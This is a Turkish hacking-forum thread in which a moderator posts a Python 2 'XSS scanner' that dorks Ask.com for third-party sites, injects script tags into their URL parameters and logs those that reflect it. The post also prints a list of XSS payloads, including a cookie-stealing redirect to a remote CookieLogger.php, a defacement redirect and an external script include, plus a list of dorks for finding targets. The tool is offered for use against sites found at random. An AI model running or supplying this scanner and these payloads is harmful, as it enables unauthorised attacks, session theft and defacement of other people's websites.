Xss Scanner

'Tool' forumunda KaliBot tarafından 6 Mart 2016 tarihinde açılan konu

  1. KaliBot

    KaliBot Moderator

    Katılım:
    30 Haziran 2015
    Mesaj:
    601
    Beğeniler:
    104
    Ödül Puanları:
    27
    Kod:
    #!/usr/bin/env python
    # xss scanner by pedr0 ubuntu
    # version 1.0
    ##
    
    
    
    
    # dependencies
    import re
    import hashlib
    import Queue
    from random import choice
    import threading
    import time
    import urllib2
    import sys
    import socket
    
    
    
    # script colorize output
    W  = "\033"; 
    R  = "\033";
    G  = "\033";
    O  = "\033";
    B  = "\033";
    
    
    
    
    # user agent to send
    USER_AGENT = ["Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3",
                 "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7",
                 "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
                 "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)",
                 "YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)",
             "Mozilla/5.0 (Windows; U; Windows NT 5.1) AppleWebKit/535.38.6 (KHTML, like Gecko) Version/5.1 Safari/535.38.6",
             "Mozilla/5.0 (Macintosh; U; U; PPC Mac OS X 10_6_7 rv:6.0; en-US) AppleWebKit/532.23.3 (KHTML, like Gecko) Version/4.0.2 Safari/532.23.3"
                ]
    option = ' '
    vuln = 0
    invuln = 0
    found = []
    
    
    
    
    
    
    
    ##
    # start script functions
    ##
    
    
    # Searches for dorks and grabs results
    class Crawl:
        def __init__(self):
            if option == '4':
                self.shell = str(raw_input('Shell location:'))
            self.dork = raw_input(B+'[+] Enter your dork:'+G)
            self.queue = Queue.Queue()
            self.pages = raw_input(B+'[+] How many pages (Max 20):'+G)
            self.qdork = urllib2.quote(self.dork)
            self.page = 1
            self.crawler()
    
    
        # Crawls Ask.com for sites and sends them to appropriate scan
        # you can change the browser search engine in "host = " variable  
        def crawler(self):
            print (O+ '[!] Please wait while Dorking for targets...\n')
            for i in range(int(self.pages)):
                host = "http://uk.ask.com/web?q=%s&page=%s" % (str(self.qdork), self.page)
                req = urllib2.Request(host)
                req.add_header('User-Agent', choice(USER_AGENT))
                response = urllib2.urlopen(req)
                source = response.read()
                start = 0
                count = 1
                end = len(source)
                numlinks = source.count('_t" href', start, end)
    
                while count < numlinks:
                    start = source.find('_t" href', start, end)
                    end = source.find(' onmousedown="return pk', start,  end)
                    link = source[start+10:end-1].replace("amp;","")
                    self.queue.put(link)
                    start = end
                    end = len(source)
                    count = count + 1
                self.page += 1
    
            if option == '3':
                for i in range(10):
                    thread = XScanClass(self.queue)
                    thread.setDaemon(True)
                    thread.start()
                self.queue.join()
    
    
    
      
    
    # scan for xss errors and output results to a file
    class XScanClass(threading.Thread):
        def __init__(self, queue):
            threading.Thread.__init__(self)
            self.queue = queue
            self.xchar = """<script>alert('xssFound')</script>"""
            self.file = 'logs/xss.txt'
    
        # checks url for possible xss vulnerability
        def run(self):
            while True:
                try:
                    site = self.queue.get(False)
                except Queue.Empty:
                    break
                if '=' in site:
                    global vuln
                    global invuln
                    xsite = site.rsplit('=', 1)[0]
                    if xsite[-1] != "=":
                        xsite = xsite + "="
                    test = xsite + self.xchar
                    try:
                        conn = urllib2.Request(test)
                        conn.add_header('User-Agent', choice(USER_AGENT))
                        opener = urllib2.build_opener()
                        data = opener.open(conn).read()
                    except:
                        self.queue.task_done()
                    else:
                        if (re.findall("xssFound", data, re.I)):
                            self.xss(test)
                            vuln += 1
                        else:
                            print R+'[not vuln]'+B+' ->  '+test +''
                            invuln += 1
                else:
                    print R+'[not vuln]'+B+' ->  '+site +''
                    invuln += 1
                self.queue.task_done()
    
        # Proccesses vuln sites into text file and outputs to screen
        def xss(self, url):
            read = open(self.file, "a+").read()
            if url in read:
                print O+'[possible] ->  ' + url
            else:
                print G+"[xssFound] ->  " + url
                write = open(self.file, "a+")
                write.write('[XSS] ->  ' + url + "\n")
                write.close()   
                time.sleep(2)
    
    
    
    
    
    
    # output scan results to screen
    def output():
        print '\n' +O
        print '     ' + str(vuln) + G+' Vulnerable Sites Found' +O
        print '     ' + str(invuln) + R+' Sites Not Vulnerable' +O
        print '     Output Saved To:'+B+'[ opensource/logs/xss.txt ]\n\n' + W
        exit()
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    # display xss injections list
    def listx():
        print (O+'''xss injection:
    
                 "><script>alert("xss vuln found")</script>
                 "><script>alert(document.cookie)</script>
                 "><script>alert(String.fromCharCode(88,83,83))</script>
                 "><marquee><script>alert('xss vuln found')</script></marquee>
                 "><script><center><b><h1>xss vuln found</h1></b></center></script>
                 "><script>alert(xss vuln found)<marquee><h1>xss vuln found</h1></marquee></script>
                 "></script><sc""><marquee><H1>xss vuln found</H1></marquee><br /><center><IMG src="http://db.tt/E7dH5HLR"></center></script>
                 "><script>document.location="http://www.host.com/mysite/CookieLogger.php?cookie=" + document.cookie;</script>
                 <script>window.location="http://www.pastehtml.com/YOURDEFACEHERE/";</script>
                 <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('xss vuln found');\">
                 <script src=http://yoursite.com/your_files.js></script>
                 <font style='color:expression(alert(document.cookie))'>
    
                 this xss injection list is only an example, you can use another injection if you wish
                 Read more about xss here:[ http://pastebin.com/V8WVALQy ]
       ''')
        print ''
    
    
    
    
    
    # dork list
    def liste():
        print (O+'''List of Dorks:
    
                 search.php?id=            index.html?id=              scrapbook.php?id=         .php?searchstring=
                 search.php?q=             index.asp?q=                contentPage.php?id=       .php?author=
                 search.php?cmd=           index.html?search=          find.php?                 .php?z=
                 search.php?query=         index.php?option=           .php?txt=                 .php?mail=
                 search.php?keyword=       read.php?id=                .php?tag=                 .php?from=
                 search.php?session=       news.php?id=                .php?max=                 .php?feedback=
                 search.php?cat=           feedpost.php?id=            .php?vote=                .php?cat=
                 search.php?               feedpost.php?url=           .php?file=                .php?q=
                 index.html?q=             default.asp?catid=          .php?query=               .php?years=
                 index.asp?catid=          headersearch.php?sid=       .php?id=                  .php?pass=
    
                 this Dork list is only an example, you can use another dork if you wish
                 Read more about xss here:[ http://pastebin.com/V8WVALQy ]
       ''')
    
    
    
    
    
    
    
    
    
    
    
    ##
    # main menu
    ##
    
    def main():
        print (G+'''
    
             1 - list of dorks
             2 - list of xss injections
             3 - scan for xss vuln websites
             s - exit
    ''')
        print W
        global option
        option = raw_input(R+'Chose Option:'+G)
    
        if option:
            if option == '1':
                liste()
            if option == '2':
                listx()
            if option == '3':
                Crawl()
                output()
                print choice
            if option == 's':
                exit()
    
            else:
                print B+'\n[Please chose another option]'
                time.sleep(0.9)
                main()
          
    
    
    if __name__ == '__main__':
        main()
     
  2. DUMBAS

    DUMBAS Yarbay

    Katılım:
    12 Ocak 2016
    Mesaj:
    180
    Beğeniler:
    0
    Ödül Puanları:
    16
    Şehir:
    Belirtilmemiş
    derleyip ne diye kaydedelim ?
     
  3. karilinux

    karilinux Member

    Katılım:
    20 Ocak 2016
    Mesaj:
    147
    Beğeniler:
    0
    Ödül Puanları:
    16
    Cinsiyet:
    Erkek
    Meslek:
    Öğrenci

Bu Sayfayı Paylaş